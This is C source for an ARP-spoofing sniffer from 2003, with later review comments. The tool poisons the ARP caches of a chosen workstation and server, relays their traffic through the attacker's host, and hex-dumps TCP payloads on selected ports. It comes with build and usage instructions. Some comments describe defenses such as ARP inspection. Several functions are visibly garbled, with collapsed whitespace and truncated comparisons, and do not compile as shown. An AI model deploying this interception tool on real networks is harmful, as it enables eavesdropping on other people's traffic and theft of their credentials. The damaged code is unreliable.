/*============================================================================
Coder: Paris-ye
Released on: 1/9/2003
Test on: redhat 9.0
Information: This is an ARP spoof sniffer. W B M
Make: first you must install "pcap" and "libnet"
      gcc -I/usr/local/include -L/usr/local/lib -o sniffer sniffer.c -lpcap -lnet
Usage: ./sniffer -I [Interface] -M [SelfIP] -W [WorkstationIP] -S [ServerIP] -P [port]
============================================================================*/
#include; #include; #include; #include; #include;
/*
 * Capture settings. main() hands these to pcap_open_live() as the snapshot
 * length (MAXBUF), the promiscuous flag (PROMISC) and the read timeout
 * (PCAP_TOUT).
 */
#define MAXBUF 1024*4
#define PCAP_TOUT 5
#define PROMISC 0
#define TRUE 1
#define FALSE 0

/* Ethernet protocol IDs (the ether_type field). */
#define ETHERTYPE_PUP 0x0200    /* Xerox PUP */
#define ETHERTYPE_IP 0x0800     /* IP */
#define ETHERTYPE_ARP 0x0806    /* Address resolution */
#define ETHERTYPE_REVARP 0x8035 /* Reverse ARP */

/* This structure defines an ethernet arp header. */

/* ARP protocol opcodes. */
#define ARPOP_REQUEST 1   /* ARP request. */
#define ARPOP_REPLY 2     /* ARP reply. */
#define ARPOP_RREQUEST 3  /* RARP request. */
#define ARPOP_RREPLY 4    /* RARP reply. */
#define ARPOP_InREQUEST 8 /* InARP request. */
#define ARPOP_InREPLY 9   /* InARP reply. */
#define ARPOP_NAK 10      /* (ATM)ARP NAK. */

/* ARP protocol HARDWARE identifiers. */
#define ARPHRD_NETROM 0    /* From KA9Q: NET/ROM pseudo. */
#define ARPHRD_ETHER 1     /* Ethernet 10/100Mbps. */
#define ARPHRD_EETHER 2    /* Experimental Ethernet. */
#define ARPHRD_AX25 3      /* AX.25 Level 2. */
#define ARPHRD_PRONET 4    /* PROnet token ring. */
#define ARPHRD_CHAOS 5     /* Chaosnet. */
#define ARPHRD_IEEE802 6   /* IEEE 802.2 Ethernet/TR/TB. */
#define ARPHRD_ARCNET 7    /* ARCnet. */
#define ARPHRD_APPLETLK 8  /* APPLEtalk. */
#define ARPHRD_DLCI 15     /* Frame Relay DLCI. */
#define ARPHRD_ATM 19      /* ATM. */
#define ARPHRD_METRICOM 23 /* Metricom STRIP (new IANA id). */

/*
 * Dummy types for non ARP hardware.
 *
 * NOTE(review): every value from here on carries a 0x prefix in this listing.
 * The system <net/if_arp.h> spells the same constants in decimal (256, 512,
 * 768, 800, ...), so these macros do not have the system's numeric values.
 * arpsend() in this file depends on ARPHRD_IEEE802_TR being 0x800.
 */
#define ARPHRD_SLIP 0x256
#define ARPHRD_CSLIP 0x257
#define ARPHRD_SLIP6 0x258
#define ARPHRD_CSLIP6 0x259
#define ARPHRD_RSRVD 0x260 /* Notional KISS type. */
#define ARPHRD_ADAPT 0x264
#define ARPHRD_ROSE 0x270
#define ARPHRD_X25 0x271   /* CCITT X.25. */
#define ARPHDR_HWX25 0x272 /* Boards with X.25 in firmware. */
#define ARPHRD_PPP 0x512
#define ARPHRD_CISCO 0x513 /* Cisco HDLC. */
#define ARPHRD_HDLC ARPHRD_CISCO
#define ARPHRD_LAPB 0x516    /* LAPB. */
#define ARPHRD_DDCMP 0x517   /* Digital's DDCMP. */
#define ARPHRD_RAWHDLC 0x518 /* Raw HDLC. */

#define ARPHRD_TUNNEL 0x768     /* IPIP tunnel. */
#define ARPHRD_TUNNEL6 0x769    /* IPIP6 tunnel. */
#define ARPHRD_FRAD 0x770       /* Frame Relay Access Device. */
#define ARPHRD_SKIP 0x771       /* SKIP vif. */
#define ARPHRD_LOOPBACK 0x772   /* Loopback device. */
#define ARPHRD_LOCALTLK 0x773   /* Localtalk device. */
#define ARPHRD_FDDI 0x774       /* Fiber Distributed Data Interface. */
#define ARPHRD_BIF 0x775        /* AP1000 BIF. */
#define ARPHRD_SIT 0x776        /* sit0 device - IPv6-in-IPv4. */
#define ARPHRD_IPDDP 0x777      /* IP-in-DDP tunnel. */
#define ARPHRD_IPGRE 0x778      /* GRE over IP. */
#define ARPHRD_PIMREG 0x779     /* PIMSM register interface. */
#define ARPHRD_HIPPI 0x780      /* High Performance Parallel I'face. */
#define ARPHRD_ASH 0x781        /* (Nexus Electronics) Ash. */
#define ARPHRD_ECONET 0x782     /* Acorn Econet. */
#define ARPHRD_IRDA 0x783       /* Linux-IrDA. */
#define ARPHRD_FCPP 0x784       /* Point to point fibrechanel. */
#define ARPHRD_FCAL 0x785       /* Fibrechanel arbitrated loop. */
#define ARPHRD_FCPL 0x786       /* Fibrechanel public loop. */
#define ARPHRD_FCPFABRIC 0x787  /* Fibrechanel fabric. */
#define ARPHRD_IEEE802_TR 0x800 /* Magic type ident for TR. */
#define ARPHRD_IEEE80211 0x801  /* IEEE 802.11. */

/* IP version number */
#define IPVERSION 4
/* Ethernet frame header as it is overlaid on captured and transmitted frames. */
struct ether_header {
    u_int8_t  ether_dhost[6]; /* destination eth addr */
    u_int8_t  ether_shost[6]; /* source ether addr */
    u_int16_t ether_type;     /* packet type ID field; this file reads it through ntohs() */
};
/*
 * ARP header with the Ethernet/IPv4 address fields laid out inline
 * (6-byte hardware addresses, 4-byte protocol addresses).
 */
struct arphdr {
    unsigned short int ar_hrd;  /* Format of hardware address. */
    unsigned short int ar_pro;  /* Format of protocol address. */
    unsigned char ar_hln;       /* Length of hardware address. */
    unsigned char ar_pln;       /* Length of protocol address. */
    unsigned short int ar_op;   /* ARP opcode (command). */
    unsigned char __ar_sha[6];  /* Sender hardware address. */
    unsigned char __ar_sip[4];  /* Sender IP address. */
    unsigned char __ar_tha[6];  /* Target hardware address. */
    unsigned char __ar_tip[4];  /* Target IP address. */
};
/*
 * Structure of an internet header, naked of options.
 *
 * NOTE(review): ip_hl is declared before ip_v, which is the little-endian
 * arrangement used by <netinet/ip.h>; on a big-endian target the two nibbles
 * would be read swapped. Confirm the target before reusing this layout.
 */
struct iphead {
    unsigned int ip_hl:4;        /* header length */
    unsigned int ip_v:4;         /* version */
    u_int8_t ip_tos;             /* type of service */
    u_short ip_len;              /* total length */
    u_short ip_id;               /* identification */
    u_short ip_off;              /* fragment offset field */
    u_int8_t ip_ttl;             /* time to live */
    u_int8_t ip_p;               /* protocol */
    u_short ip_sum;              /* checksum */
    u_char ip_src[4], ip_dst[4]; /* source and dest address */
};
/*
 * Fixed part of a TCP header; the TH_* flag masks are defined next to the
 * th_flags member they apply to.
 *
 * NOTE(review): th_off is declared ahead of th_x2. The little-endian layout in
 * <netinet/tcp.h> declares th_x2 first, so on such a target th_off here would
 * read the reserved nibble. Nothing in this listing reads th_off; confirm the
 * order before relying on it.
 */
struct tcphead {
    u_int16_t th_sport; /* source port */
    u_int16_t th_dport; /* destination port */
    u_int32_t th_seq;   /* sequence number */
    u_int32_t th_ack;   /* acknowledgement number */
    u_int8_t th_off:4;  /* data offset */
    u_int8_t th_x2:4;   /* (unused) */
    u_int8_t th_flags;
#define TH_FIN 0x01
#define TH_SYN 0x02
#define TH_RST 0x04
#define TH_PUSH 0x08
#define TH_ACK 0x10
#define TH_URG 0x20
    u_int16_t th_win;   /* window */
    u_int16_t th_sum;   /* checksum */
    u_int16_t th_urp;   /* urgent pointer */
};
/*
 * IPv4 and MAC addresses of the three hosts this program deals with:
 * W (workstation), S (server) and M (the machine running the program).
 */
struct ipmacaddr {
    u_char ipW[4];
    u_char macW[6];
    u_char ipS[4];
    u_char macS[6];
    u_char ipM[4];
    u_char macM[6];
};

/*
 * Print the banner and the command-line synopsis to stdout.
 *
 * argv  program name substituted into the synopsis and the example line
 *
 * Always returns 0.
 *
 * NOTE(review): the message texts are reproduced as they appear in this
 * listing; the blanks between words look to have been lost when the page was
 * formatted.
 */
int usage(char *argv)
{
    const char *prog = argv;

    fputs("====================================\n", stdout);
    fputs("============ArpSniffer=============\n", stdout);
    fputs("==========WritebyParis-Ye=========\n", stdout);
    printf("===Usage:%s-I[interface]-M[SelfIP]-W[WorkstationIP]-S[ServerIP]-P[port]\n", prog);
    fputs("===Forexample:\n", stdout);
    printf("\t%s-Ieth0-M192.168.0.6-W192.168.0.4-S192.168.0.254\n", prog);
    return 0;
}
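/*
 * arpsend: build one Ethernet + ARP frame and write it with libnet_write_link().
 *
 * lnet  libnet handle the frame is written through
 * smac  6-byte MAC copied into the Ethernet source and the ARP sender
 *       hardware address
 * sip   4-byte IPv4 address copied into the ARP sender protocol address
 * dmac  6-byte MAC copied into the Ethernet destination
 * dip   4-byte IPv4 address copied into the ARP target protocol address
 *
 * Returns TRUE after a successful write, FALSE when the frame buffer cannot be
 * allocated or libnet_write_link() returns -1.
 *
 * The sender fields are whatever the caller passes; nothing here ties `sip` to
 * the real owner of `smac`, and ARP gives a receiver no means to verify the
 * pairing. That is the gap switch-side ARP inspection and IP-to-MAC change
 * monitoring are meant to cover.
 */
int arpsend(libnet_t *lnet, u_char *smac, u_char *sip, u_char *dmac, u_char *dip)
{
    int ret = 0;
    u_char *packet;
    u_long packets;
    struct ether_header *ethh;
    struct arphdr *arph;

    packets = sizeof(struct ether_header) + sizeof(struct arphdr);
    packet = malloc(packets);
    if (packet == NULL) {
        /* The original dereferenced the result unchecked. */
        return FALSE;
    }
    ethh = (struct ether_header *)packet;
    arph = (struct arphdr *)(packet + sizeof(struct ether_header));

    memcpy(ethh->ether_dhost, dmac, 6);
    memcpy(ethh->ether_shost, smac, 6);
    ethh->ether_type = htons(ETHERTYPE_ARP);

    /*
     * The original filled these three fields from constants of the wrong
     * family (ARPOP_REQUEST, ARPHRD_IEEE802_TR, ARPHRD_ETHER). With this
     * file's definitions those are 1, 0x800 and 1, so the names below put the
     * same bytes in the frame while saying what each field means.
     */
    arph->ar_hrd = htons(ARPHRD_ETHER);
    arph->ar_pro = htons(ETHERTYPE_IP);
    arph->ar_hln = 6;
    arph->ar_pln = 4;
    arph->ar_op = htons(ARPOP_REQUEST);

    memcpy(arph->__ar_sha, smac, 6);
    memcpy(arph->__ar_sip, sip, 4);
    memset(arph->__ar_tha, 0, 6);
    memcpy(arph->__ar_tip, dip, 4);

    ret = libnet_write_link(lnet, packet, packets);

    /* The original returned without releasing the buffer on either path. */
    free(packet);

    if (ret == -1) {
        return FALSE;
    }
    return TRUE;
}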
/*
 * arpspoof: every 6 seconds, send two ARP frames through arpsend():
 *   - to W's MAC, with sender fields pairing S's IP with M's MAC;
 *   - to S's MAC, with sender fields pairing W's IP with M's MAC.
 *
 * lnet   libnet handle handed on to arpsend()
 * ipmac  address table the MAC and IP values are read from
 *
 * Never returns; the result of arpsend() is not looked at.
 *
 * Seen from the network this is a single MAC address being announced for two
 * different IPv4 addresses at a fixed 6-second cadence.
 */
void arpspoof(libnet_t *lnet, struct ipmacaddr *ipmac)
{
    for (;;) {
        arpsend(lnet, ipmac->macM, ipmac->ipS, ipmac->macW, ipmac->ipW);
        arpsend(lnet, ipmac->macM, ipmac->ipW, ipmac->macS, ipmac->ipS);
        sleep(6);
    }
}
/*
 * forwarddate: relay an IP frame between W and S.
 *
 * Frames that are not IP, that were sent by M itself, or that are not
 * addressed to M's MAC are left alone. For the rest, a frame whose source MAC
 * is W's is rewritten to go from M to S, a frame whose source MAC is S's is
 * rewritten to go from M to W, and the rewritten frame is written out with
 * libnet_write_link().
 *
 * lnet    libnet handle used for the write
 * packet  captured frame, starting at the Ethernet header
 * len     number of bytes to write
 * macW, macS, macM  6-byte MAC addresses of W, S and M
 *
 * Always returns TRUE; the result of libnet_write_link() is discarded.
 *
 * NOTE(review): `packet` is declared const but the Ethernet header is patched
 * in place through a cast, so the capture buffer itself is modified.
 * NOTE(review): `len` is never compared with sizeof(struct ether_header)
 * before the header is read.
 */
int forwarddate(libnet_t *lnet, const u_char *packet, int len, u_char *macW, u_char *macS, u_char *macM)
{
    struct ether_header *eth = (struct ether_header *)packet;

    if (ntohs(eth->ether_type) != ETHERTYPE_IP) {
        return TRUE;
    }
    if (memcmp(eth->ether_shost, macM, 6) == 0) {
        /* sent by M itself */
        return TRUE;
    }
    if (memcmp(eth->ether_dhost, macM, 6) != 0) {
        /* not addressed to M */
        return TRUE;
    }

    if (memcmp(eth->ether_shost, macW, 6) == 0) {
        /* from W: readdress M -> S */
        memcpy(eth->ether_shost, macM, 6);
        memcpy(eth->ether_dhost, macS, 6);
        libnet_write_link(lnet, (u_char *)packet, len);
    }
    /* Kept as a separate test, as in the original, not an else-branch. */
    if (memcmp(eth->ether_shost, macS, 6) == 0) {
        /* from S: readdress M -> W */
        memcpy(eth->ether_shost, macM, 6);
        memcpy(eth->ether_dhost, macW, 6);
        libnet_write_link(lnet, (u_char *)packet, len);
    }

    return TRUE;
}
/*
 * printdat: hex-and-ASCII dump of the bytes at `packet` to stdout, 16 bytes
 * per row, followed by a final partial row when the row loop stops with
 * i != len.
 *
 * packet  start of the data to dump
 * len     number of bytes the caller says are there
 *
 * NOTE(review): this function was damaged when the page was formatted. Every
 * `for` header, the `(i+j)` comparisons and the printable-range test around
 * `126` are cut off after their first operand, and the separators inside the
 * format strings appear to be missing. It does not compile as shown and the
 * exact loop bounds cannot be recovered from this listing.
 *
 * NOTE(review): the partial-row branch still does memcpy(str, packet+i, 16),
 * a full 16-byte copy, although its own `(i+j)` tests (presumably against
 * `len`) show that fewer than 16 bytes remain there. That reads past the end
 * of the data. The only caller in this listing, parsedate(), computes `len`
 * from the IP header of the captured packet.
 */
/*printhexdatetoAscii*/ voidprintdat(u_char*packet,intlen) { inti=0,j=0; u_charstr[16]; for(i=0;i { memcpy(str,packet+i,16); fprintf(stdout,”%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x”, str[0],str[1],str[2],str[3], str[4],str[5],str[6],str[7], str[8],str[9],str[10],str[11], str[12],str[13],str[14],str[15] ); for(j=0;j { if(str[j];126) str[j]=’.’; } fprintf(stdout,”%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c\n”, str[0],str[1],str[2],str[3], str[4],str[5],str[6],str[7], str[8],str[9],str[10],str[11], str[12],str[13],str[14],str[15] ); } if(i!=len) { memcpy(str,packet+i,16); for(j=0;j { if(j%4==0&&j!=0) fprintf(stdout,””); if((i+j) { fprintf(stdout,”%02x”,str[j]); } else fprintf(stdout,””); } fprintf(stdout,””); for(j=0;j { if((i+j) { if(str[j];126) str[j]=’.’; fprintf(stdout,”%c”,str[j]); } } fprintf(stdout,”\n\n”); } }
/*
 * parsedate: decide whether a captured frame is TCP traffic involving W and,
 * if its PSH flag is set, print an address line and dump the payload with
 * printdat().
 *
 * The frame is overlaid with ether_header, iphead and tcphead at fixed
 * offsets. It is rejected (FALSE) unless the source MAC is W's or S's, the
 * destination MAC is M's, the ethertype is IP, ip_v is 4 and ip_hl is 5,
 * ip_src or ip_dst equals ipW, and the protocol is TCP. Otherwise the function
 * returns TRUE, apart from the bare `return;` on the port == 0 path.
 *
 * packet  captured frame, starting at the Ethernet header
 * len     frame length as passed by the caller (not used in the body)
 * macW, macS, macM  6-byte MAC addresses of W, S and M
 * ipW     4-byte IPv4 address of W
 * ipS     4-byte IPv4 address of S (not used in the body)
 * port    port filter handed over from main()
 *
 * NOTE(review): `len` is never consulted, so all three headers are read
 * without checking that the frame is long enough to contain them.
 * NOTE(review): `contents` is taken from the packet's own ip_len minus two
 * fixed header sizes. It can come out negative or larger than what was
 * captured, and it is passed to printdat() unchecked.
 * NOTE(review): the TCP header is assumed to be sizeof(struct tcphead) bytes;
 * th_off is ignored, so any TCP options are dumped as payload.
 * NOTE(review): `port` is an int pointer, yet it is compared with port numbers
 * and printed with %d. The subscripts (presumably port[i]) look to have been
 * lost when the page was formatted, like other bracketed text in this listing.
 * NOTE(review): `for(i==0;...)` compares instead of assigning; i is already 0
 * from its declaration. `return;` carries no value in a function declared int.
 */
/*parsepacket*/ intparsedate(constu_char*packet,intlen,u_char*macW,u_char*macS,u_char*macM,u_char*ipW,u_char*ipS,int*port) { int i=0; intcontents; u_char*content; constu_char*datapoint=packet; structether_header*ethhdr; structiphead*iph; structtcphead*tcph;
ethhdr=(structether_header*)datapoint; iph=(structiphead*)(datapoint+sizeof(structether_header)); tcph=(structtcphead*)(datapoint+sizeof(structether_header)+sizeof(structiphead)); if(memcmp(ethhdr->;ether_shost,macW,6)&&memcmp(ethhdr->;ether_shost,macS,6)) returnFALSE; if(memcmp(ethhdr->;ether_dhost,macM,6)) returnFALSE; if(ntohs(ethhdr->;ether_type)!=ETHERTYPE_IP) returnFALSE; if(iph->;ip_v!=4||iph->;ip_hl!=5) returnFALSE; if(!(!memcmp(iph->;ip_dst,ipW,4)||!memcmp(iph->;ip_src,ipW,4))) returnFALSE; if(iph->;ip_p!=IPPROTO_TCP) returnFALSE; contents=htons(iph->;ip_len)-sizeof(structiphead)-sizeof(structtcphead); content=(u_char*)(datapoint+sizeof(structether_header)+sizeof(structiphead)+sizeof(structtcphead)); if((tcph->;th_flags&TH_PUSH)) { for(i==0;port!=0;i++) { printf(“=====%d%d\n”,port,htons(tcph->;th_dport)); if(port==htons(tcph->;th_dport)||port==htons(tcph->;th_sport)) break; } if(port==0) return; printf(“Size:[%d][%d.%d.%d.%d:%d]->;[%d.%d.%d.%d:%d]\n”,htons(iph->;ip_len), iph->;ip_src[0],iph->;ip_src[1],iph->;ip_src[2],iph->;ip_src[3],htons(tcph->;th_sport), iph->;ip_dst[0],iph->;ip_dst[1],iph->;ip_dst[2],iph->;ip_dst[3],htons(tcph->;th_dport) ); printdat(content,contents); }
returnTRUE; }
/*
 * agentpacket: capture loop. Each frame returned by pcap_next() is handed
 * first to parsedate() and then to forwarddate(); empty reads are skipped.
 *
 * lnet   libnet handle passed on to forwarddate()
 * lpcap  open pcap capture handle
 * ipmac  address table for W, S and M
 * port   port filter passed on to parsedate()
 *
 * The loop has no exit, so the trailing return is never reached.
 *
 * NOTE(review): the length handed to both helpers is hdr.len. In libpcap that
 * field is the length of the packet on the wire; the number of bytes actually
 * present in the buffer is hdr.caplen.
 */
int agentpacket(libnet_t *lnet, pcap_t *lpcap, struct ipmacaddr *ipmac, int *port)
{
    struct pcap_pkthdr hdr;
    const u_char *frame;

    for (;;) {
        frame = pcap_next(lpcap, &hdr);
        if (frame != NULL && hdr.len != 0) {
            parsedate(frame, hdr.len, ipmac->macW, ipmac->macS, ipmac->macM, ipmac->ipW, ipmac->ipS, port);
            forwarddate(lnet, frame, hdr.len, ipmac->macW, ipmac->macS, ipmac->macM);
        }
    }

    return TRUE;
}
/*
 * gettargetmac: used during start-up to learn the MAC addresses of S and W.
 * Once a second it sends two ARP requests through arpsend(), both with M's
 * own MAC and IP as sender: one for W's IP, one for S's IP.
 *
 * lnet   libnet handle handed on to arpsend()
 * ipmac  address table the MAC and IP values are read from
 *
 * The loop has no exit, so the trailing return is never reached.
 * getmacaddress() runs this in a forked child and ends it with kill().
 */
int gettargetmac(libnet_t *lnet, struct ipmacaddr *ipmac)
{
    for (;;) {
        arpsend(lnet, ipmac->macM, ipmac->ipM, ipmac->macW, ipmac->ipW);
        arpsend(lnet, ipmac->macM, ipmac->ipM, ipmac->macS, ipmac->ipS);
        sleep(1);
    }
    return TRUE;
}
/*
 * getmacaddress: fill in the three MAC addresses of the ipmac table.
 *
 * 1. Reads the local interface's hardware address with SIOCGIFHWADDR and
 *    stores it in ipmac->macM.
 * 2. Forks a child that runs gettargetmac().
 * 3. In the parent, reads frames with pcap_next(). For ARP frames addressed to
 *    macM whose target IP is ipM, it copies the sender hardware address into
 *    macW when the sender IP is ipW and into macS when it is ipS.
 * 4. Once both have been seen (isgetmac == 0xFFFFFFFF), kills the child with
 *    signal 9 and returns TRUE.
 *
 * dev    interface name
 * lnet   libnet handle passed to the child's gettargetmac()
 * lpcap  open pcap capture handle
 * ipmac  address table: ipW, ipS and ipM are read; macM, macW, macS are written
 *
 * Returns FALSE when the socket or the ioctl fails, TRUE otherwise.
 *
 * NOTE(review): this function was damaged when the page was formatted. The
 * tests after `if(skfd` and `if(ioctl(...)` have lost their comparison, and
 * the middle source line starts with `//`, so as pasted that entire physical
 * line is a comment.
 * NOTE(review): strcpy() into ifr.ifr_name has no length limit; `dev` comes
 * from the command line.
 * NOTE(review): the socket is not closed on the ioctl failure path.
 * NOTE(review): the result of fork() is not checked for -1. If fork() failed,
 * the final kill(pid,9) would be kill(-1,9), which signals every process the
 * caller is allowed to signal.
 * NOTE(review): ar_op and the frame length are not checked before the ARP
 * fields are read.
 */
/* WheninitializeGettheSandWMacaddress parsearpreply */ intgetmacaddress(char*dev,libnet_t*lnet,pcap_t*lpcap,structipmacaddr*ipmac) { intskfd=0; unsignedintisgetmac=0x0; pid_t pid=0; structifreqifr; constu_char*packet; structpcap_pkthdrhdr; structether_header*ethhdr; structarphdr* arph;
//———-getlocalmacadrress strcpy(ifr.ifr_name,dev); skfd=socket(AF_INET,SOCK_DGRAM,0); if(skfd { printf(“Can’topensocket!\n”); returnFALSE; } if(ioctl(skfd,SIOCGIFHWADDR,&ifr) { printf(“Can’treadlocalmacaddress!\n”); returnFALSE; } memcpy(ipmac->;macM,ifr.ifr_hwaddr.sa_data,6); close(skfd); //———-gettargetmacaddress pid=fork(); if(pid==0) { gettargetmac(lnet,ipmac); exit(TRUE); } while(1) { packet=pcap_next(lpcap,&hdr); if(packet==NULL||hdr.len==0) continue; ethhdr=(structether_header*)packet; arph=(structarphdr*)(packet+sizeof(structether_header));
if(memcmp(ethhdr->;ether_dhost,ipmac->;macM,6)) continue; if(ntohs(ethhdr->;ether_type)!=ETHERTYPE_ARP) continue; if(!memcmp(arph->;__ar_sip,ipmac->;ipW,4)&&!memcmp(arph->;__ar_tip,ipmac->;ipM,4)) { memcpy(ipmac->;macW,arph->;__ar_sha,6); isgetmac=0xFFFF0000|isgetmac; } if(!memcmp(arph->;__ar_sip,ipmac->;ipS,4)&&!memcmp(arph->;__ar_tip,ipmac->;ipM,4)) { memcpy(ipmac->;macS,arph->;__ar_sha,6); isgetmac=0x0000FFFF|isgetmac; } if(isgetmac==0xFFFFFFFF) break; } kill(pid,9); returnTRUE; }
/*
 * main: parse the -I, -M, -W, -S and -P options, open the interface with
 * pcap_open_live() and libnet_init(), learn the three MAC addresses with
 * getmacaddress(), then fork: the child runs arpspoof(), the parent runs
 * agentpacket().
 *
 * Returns FALSE on any set-up failure and TRUE at the end.
 *
 * NOTE(review): this function was damaged when the page was formatted. The
 * test after `if(argc` has lost its comparison, and `port=atoi(p)` and
 * `port=0` presumably were subscripted stores (port[i]) into the int
 * port[100] array.
 * NOTE(review): strcpy(dev,optarg) copies a command-line string into the
 * 32-byte `dev` buffer with no length check.
 * NOTE(review): the -P loop increments i with no bound against the 100
 * entries of `port`, and atoi() cannot report a malformed number.
 * NOTE(review): the inet_addr() results are copied without being checked for
 * the error value.
 * NOTE(review): `c` is a char compared with EOF, while getopt() returns int;
 * where plain char is unsigned the comparison can never be true.
 * NOTE(review): macW, macS and macM have seven initialisers and each MAC
 * printf passes index [6] as a seventh argument to six conversions, which
 * evaluates one byte past the 6-byte arrays in struct ipmacaddr.
 * NOTE(review): the addresses are printed before `ret` from getmacaddress()
 * is checked.
 * NOTE(review): the result of fork() is not checked for -1.
 * NOTE(review): FALSE is 0 and TRUE is 1, so every error path leaves with exit
 * status 0 and the normal end with status 1. That end is only reached if
 * agentpacket() returns, and its loop in this listing has no exit.
 */
intmain(intargc,char*argv[]) { int ret=0,i=0; char *p,*s; char c; char string[]=”I:M:W:S:P:”; int port[100]; char dev[32]=””; structipmacaddripmac; pid_t pid; libnet_t* lnet; pcap_t*lpcap; bpf_u_int32netp,maskp; structbpf_programfp; charerr[PCAP_ERRBUF_SIZE]; charfilterstr[]=””;
unsignedintipM; unsignedintipW; unsignedintipS; u_charmacW[]={255,255,255,255,255,255,255}; u_charmacS[]={255,255,255,255,255,255,255}; u_charmacM[]={255,255,255,255,255,255,255};
bzero(&ipmac,sizeof(structipmacaddr)); if(argc { usage(argv[0]); returnFALSE; } while((c=getopt(argc,argv,string))!=EOF) { switch(c) { case(‘I’): strcpy(dev,optarg); break; case(‘M’): ipM=inet_addr(optarg); memcpy(ipmac.ipM,(void*)&ipM,4); break; case(‘W’): ipW=inet_addr(optarg); memcpy(ipmac.ipW,(void*)&ipW,4); break; case(‘S’): ipS=inet_addr(optarg); memcpy(ipmac.ipS,(void*)&ipS,4); break; case(‘P’): printf(“%s\n”,optarg); s=optarg; p=strtok(s,”:”); while(p) { port=atoi(p); printf(“%d\n”,port); p=strtok(NULL,”:”); i++; } port=0;
break; default: usage(argv[0]); returnFALSE; } }
memcpy(ipmac.macW,macW,6); memcpy(ipmac.macS,macS,6); memcpy(ipmac.macM,macM,6); ret=pcap_lookupnet(dev,&netp,&maskp,err); if(ret==-1) { printf(“Can’tinitializePCAP![%s]\n”,err); returnFALSE; } lpcap=pcap_open_live( dev, MAXBUF, PROMISC, PCAP_TOUT, err ); if(lpcap==NULL) { printf(“Can’tinitializePCAP![%s]\n”,err); returnFALSE; }
ret=pcap_compile(lpcap,&fp,filterstr,0,netp); if(ret==-1) { printf(“Errorpcap_compile!\n”); returnFALSE; }
ret=pcap_setfilter(lpcap,&fp); if(ret==-1) { printf(“Errorpcap_setfilter!\n”); returnFALSE; }
lnet=libnet_init( LIBNET_LINK, dev, err); if(lnet==NULL) { printf(“Can’tinitializelibnet!Pleasecheckthe[dev]\n”); returnFALSE; }
ret=getmacaddress(dev,lnet,lpcap,&ipmac); printf(“Getnetworkcardsmacaddress:\n”); printf(“M->;%02x:%02x:%02x:%02x:%02x:%02x\n”,ipmac.macM[0],ipmac.macM[1],ipmac.macM[2],ipmac.macM[3],ipmac.macM[4],ipmac.macM[5],ipmac.macM[6]); printf(“W->;%02x:%02x:%02x:%02x:%02x:%02x\n”,ipmac.macW[0],ipmac.macW[1],ipmac.macW[2],ipmac.macW[3],ipmac.macW[4],ipmac.macW[5],ipmac.macW[6]); printf(“S->;%02x:%02x:%02x:%02x:%02x:%02x\n”,ipmac.macS[0],ipmac.macS[1],ipmac.macS[2],ipmac.macS[3],ipmac.macS[4],ipmac.macS[5],ipmac.macS[6]); printf(“\nNowStart……\n”); if(ret==FALSE) { returnFALSE; }
pid=fork(); if(pid==0) { arpspoof(lnet,&ipmac); returnFALSE; }else { agentpacket(lnet,lpcap,&ipmac,port); }
libnet_destroy(lnet); pcap_close(lpcap); printf(“Done\n”); returnTRUE; }